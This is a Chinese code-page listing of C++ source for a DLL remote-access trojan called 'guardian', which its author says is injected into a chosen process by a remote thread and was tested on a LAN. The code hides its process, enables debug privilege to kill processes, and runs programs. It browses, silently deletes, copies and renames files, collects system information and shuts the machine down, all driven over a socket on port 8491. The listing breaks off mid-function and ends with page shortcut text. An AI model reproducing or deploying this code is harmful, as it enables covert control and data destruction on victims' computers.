📄 dll守护进程.txt
字号:
获取远程时间:NetRemoteTOD()
添加一项任务:NetScheduleJobAdd()
WARING:
/////////////////////////////////////////////////////////////////////////////////////////
关于守护者:
守护者是一个DLL木马,利用远线程在指定的进程中加载,由于这是一个测试版本所以只有一些基本的工能,如文件操作,关机,杀进程,一些其他的功能我会陆续加入
此代码在WIN2000SERVER BCB5下通过,局域网测试通过!!
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
先是DLL的源码:
#pragma hdrstop
file://---------------------------------------------------------------------------
#pragma argsused
#include <windows.h>
#include <winsock.h>
#include <mmsystem.h>
#include <condefs.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <math.h>
file://注册服务
#define SERVICE_PROC 1
file://卸载服务
#define UNSERVICE_PROC 0
#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255
file://缓冲区长度
#define dwBuffSize 2048
file://命令行长度
#define dwComm 50
#define PORT 8491
#define WM_SOCKET WM_USER+1
#define PROMPT "QUEEN:\\>"
DWORD dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szReadBuff,Ob,TempBuff;
int addrlen;
HINSTANCE DLLInst;
DWORD (WINAPI *RegisterServiceProcess)(DWORD, DWORD);
file://---------------------------------------------------------------------------
// GetOS
// 判断操作系统
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
DWORD WINAPI GetOS()
{
OSVERSIONINFO os;
TCHAR sVersion[MAX_PATH];
os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&os);
switch(os.dwPlatformId)
{
case VER_PLATFORM_WIN32_WINDOWS:
return VER_PLATFORM_WIN32_WINDOWS;
case VER_PLATFORM_WIN32_NT:
return VER_PLATFORM_WIN32_NT;
}
}
file://---------------------------------------------------------------------------
// HideProc
// 注册进程
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
BOOL WINAPI HideProc(int mode)
{
DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else return FALSE;
}
////////////////////////////////////////////////////////////////////////////
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//设定权限
{
TOKEN_PRIVILEGES tp;
LUID luid;
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u\n", GetLastError() );
return FALSE;
}
return TRUE;
}
////////////////////////////////////////////////////////////////////////////
BOOL KillPS(DWORD id)
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
{
printf("\nOpen Current Process Token failed:%d",GetLastError());
}
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
printf("\nSetPrivilege ok!");
}
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("\nOpen Process %d failed:%d",id,GetLastError());
}
if(!TerminateProcess(hProcess,1))
{
printf("\nTerminateProcess failed:%d",GetLastError());
}
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}
file://---------------------------------------------------------------------------
// EnumProcess
// 枚举进程
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI EnumProcess()
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
TCHAR szFileName[MAX_PATH];
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,//进程列表包含在快照集里
0);//0表示当前进程
if (hProcessSnap == (HANDLE)-1)//调用失败返回-1
{
wsprintf(szFileName,"\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
pe32.dwSize = sizeof(PROCESSENTRY32);
wsprintf(szFileName,"\nProcessName ProcessID");
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
if (Process32First(hProcessSnap, &pe32))//取得系统快照集中有关的第一个进程的信息
{
do
{wsprintf(szFileName,"\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
while (Process32Next(hProcessSnap, &pe32));//取得记录在系统快照集中有关的下一个进程的信息
}
else
{
file://printf("\nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
}
file://---------------------------------------------------------------------------
// LoadProcess
// 执行文件
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
BOOL WINAPI LoadProcess(LPCTSTR szFileName)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOWNORMAL;
if(CreateProcess(szFileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi)==FALSE)
{
return FALSE;
}
return TRUE;
}
file://---------------------------------------------------------------------------
// Dir
// 浏览文件,支持通配符
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI Dir(LPCTSTR lParam)
{
WIN32_FIND_DATA wfd;
HANDLE hHandle;
TCHAR szFileName[MAX_PATH];
int i;
wsprintf(szFileName,"\n\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
lstrcpy(szFileName,lParam);
if((hHandle=FindFirstFile(szFileName,&wfd))!=INVALID_HANDLE_VALUE)
{
do
{
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
wsprintf(szFileName,"%-20s %10lu <DIR>\n\r",wfd.cFileName,wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_READONLY)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10luARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_HIDDEN)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_SYSTEM)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
}
while(FindNextFile(hHandle,&wfd));
}
else
{
wsprintf(szFileName,"Can not find directory or files.\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
}
}
file://---------------------------------------------------------------------------
// FileOpertion
// 文件操作函数
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
BOOL WINAPI FileOpertion(LPCTSTR szFileName1,LPCTSTR szFileName2,DWORD opt)
{
SHFILEOPSTRUCT shf;
TCHAR sr[MAX_PATH];
TCHAR de[MAX_PATH];
lstrcpy(sr,szFileName1);
sr[lstrlen(sr)+1]=‘\0‘;
lstrcpy(de,szFileName2);
de[lstrlen(de)+1]=‘\0‘;
ZeroMemory(&shf,sizeof(shf));
shf.hwnd=NULL;
shf.wFunc=opt;
shf.pFrom=sr;
shf.pTo=de;
shf.fFlags=FOF_ALLOWUNDO|FOF_SILENT|FOF_FILESONLY|FOF_MULTIDESTFILES
|FOF_NOCONFIRMATION|FOF_NOCONFIRMMKDIR;
if(SHFileOperation(&shf))
return FALSE;
else
return TRUE;
}
file://---------------------------------------------------------------------------
// Delete
// 删除文件(隐藏,只读),目录,支持统配符
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI Delete(LPCTSTR lParam)
{
if(!FileOpertion(lParam,"",FO_DELETE))
send(NewSock,"Delete File is Fail",20,0);
else
send(NewSock,"Delete File is OK",18,0);
}
file://---------------------------------------------------------------------------
// Copy
// 复制,上传,下载文件(需先将自己硬盘设置为完全共享),支持统配符
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI Copy(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_COPY))
send(NewSock,"Copy File is Fail",18,0);
else
send(NewSock,"Copy File is OK",16,0);
}
file://---------------------------------------------------------------------------
// Ren
// 文件,目录重命名
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI Ren(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_RENAME))
send(NewSock,"Renname File is Fail",21,0);
else
send(NewSock,"Reanme File is OK",18,0);
}
file://---------------------------------------------------------------------------
// GetSysInfo
// 获取系统信息
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI GetSysInfo()
{
TCHAR szBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
wsprintf(szBuff,"\n\n\r<<System Information>>\n\n\r");
send(NewSock,szBuff,lstrlen(szBuff),0);
file://计算机名
DWORD len=sizeof(szTemp);
GetComputerName(szTemp,&len);
wsprintf(szBuff,"Computer Name: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
file://当前操作系统
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(szTemp,"Windows 9x");
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(szTemp,"Windows NT/2000");
break;
}
wsprintf(szBuff,"Option System: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
file://内存容量
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
wsprintf(szBuff,"Total Memroy: %dM\n\n\r",mem.dwTotalPhys/1024/1024+1);
send(NewSock,szBuff,lstrlen(szBuff),0);
file://系统目录
TCHAR szPath[MAX_PATH];
GetWindowsDirectory(szTemp,sizeof(szTemp));
GetSystemDirectory(szBuff,sizeof(szBuff));
wsprintf(szPath,"Windows Directory: %s\n\n\rSystem Directory: %s\n\n\r",szTemp,szBuff);
send(NewSock,szPath,lstrlen(szPath),0);
file://驱动器及分区类型
TCHAR szFileSys[10];
for(int i=0;i<26;++i)
{
wsprintf(szTemp,"%c:\\",‘A‘+i);
UINT uType=GetDriveType(szTemp);
switch(uType)
{
case DRIVE_FIXED:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"Hard Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_CDROM:
wsprintf(szBuff,"CD-ROM Disk: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_REMOTE:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"NetWork Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
}
}
}
file://---------------------------------------------------------------------------
// ExitWin
// 关闭计算机(WIN 9X,NT/2000)
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI ExitWin()
{
DWORD dwVer;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
dwVer=GetOS();
if(dwVer==VER_PLATFORM_WIN32_WINDOWS)
ExitWindowsEx(1,0);
else if(dwVer==VER_PLATFORM_WIN32_NT)
{
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -